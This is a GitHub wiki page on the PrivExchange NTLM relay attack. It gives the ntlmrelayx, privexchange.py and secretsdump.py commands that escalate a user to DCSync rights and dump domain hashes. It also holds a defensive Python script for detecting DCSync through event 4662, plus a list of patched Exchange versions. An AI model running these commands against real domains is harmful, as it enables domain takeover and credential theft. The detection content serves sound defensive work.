Exchange NTLM Relay Priv Escalation - CraigDonkin/Infrastructure GitHub Wiki

Exchange NTLM Relay Priv Escalation

  • Attacker runs ntlmrelayx in relay mode with LDAP on a DC as the target. Supply a user under the attacker's control to escalate privileges with:
    ntlmrelayx.py -t ldap://blahdc.blah.local --escalate-user user

  • Run the privexchange.py script:
    $ python privexchange.py -ah blah.blah.local blahexchange.blah.local -u user

  • After a minute a connection comes into ntlmrelayx, which gives the user DCSync privileges.
  • Use secretsdump.py to dump the hashes:
    secretsdump.py blah/[email protected] -just-dc
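The escalation step above ends with the relayed user holding DCSync rights, and the secretsdump step exercises them. On a domain controller with "Audit Directory Service Access" enabled, that replication request shows up as Security event 4662 with a Control Access (0x100) mask and the replication control-access GUIDs in the Properties field. The script below is an added example for this page, not code from the wiki or from impacket: it flags 4662 records where a non-DC account used DS-Replication-Get-Changes / DS-Replication-Get-Changes-All. The event records are constructed samples in a flattened key/value form (not a real export), and the rule that "accounts ending in `$` are DC machine accounts" is an assumption to tune for your directory.

```python
"""Flag DCSync-style replication access in Windows Security event 4662 records.

Added example for this page; not part of the original wiki or of impacket.
The SAMPLE_EVENTS below are constructed, simplified records, not real exports.
"""
import re

# Well-known control-access right GUIDs used by directory replication.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 access mask ("Control Access").
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100

# 4662 lists GUIDs in braces, e.g. "{1131f6ad-...} {19195a5b-...}".
GUID_RE = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")

# Constructed sample events (flattened key/value form for this example).
# The second GUID in Properties is the domainDNS class GUID, i.e. the domain object.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "user", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "user", "AccessMask": "0x20",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "user", "AccessMask": "0x0", "Properties": ""},
]


def replication_guids(properties):
    """Return the subset of replication control-access GUIDs present in a Properties string."""
    found = {g.lower() for g in GUID_RE.findall(properties or "")}
    return found & REPLICATION_RIGHTS


def is_allowed_replicator(account, extra_allowed=()):
    """Assumption: DC machine accounts end in '$'; extra_allowed covers approved service accounts."""
    if account.endswith("$"):
        return True
    return account.lower() in {a.lower() for a in extra_allowed}


def is_dcsync_candidate(event, extra_allowed=()):
    """True when a 4662 shows Control Access with a replication GUID by an unexpected account."""
    if event.get("EventID") != 4662:
        return False
    try:
        mask = int(str(event.get("AccessMask", "0")), 16)
    except ValueError:
        return False
    if not mask & ADS_RIGHT_DS_CONTROL_ACCESS:
        return False
    if not replication_guids(event.get("Properties", "")):
        return False
    return not is_allowed_replicator(event.get("SubjectUserName", ""), extra_allowed)


def find_dcsync(events, extra_allowed=()):
    """Return the events that look like replication requests from non-DC accounts."""
    return [e for e in events if is_dcsync_candidate(e, extra_allowed)]


if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS):
        rights = ", ".join(sorted(replication_guids(hit["Properties"])))
        print(f"possible DCSync by {hit['SubjectUserName']}: {rights}")
```

The same Properties check also serves as a trigger for reviewing event 5136 on the domain object, since the relayed LDAP write that grants these rights modifies the domain's nTSecurityDescriptor shortly before the replication request.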

Affected Versions

  • This has been patched with:
    • Exchange Server 2019 Cumulative Update
    • Exchange Server 2016 Cumulative Update 12
    • Exchange Server 2013 Cumulative Update 22
    • Exchange Server 2010 Service Pack 3 Update Rollup 26

Notes

https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
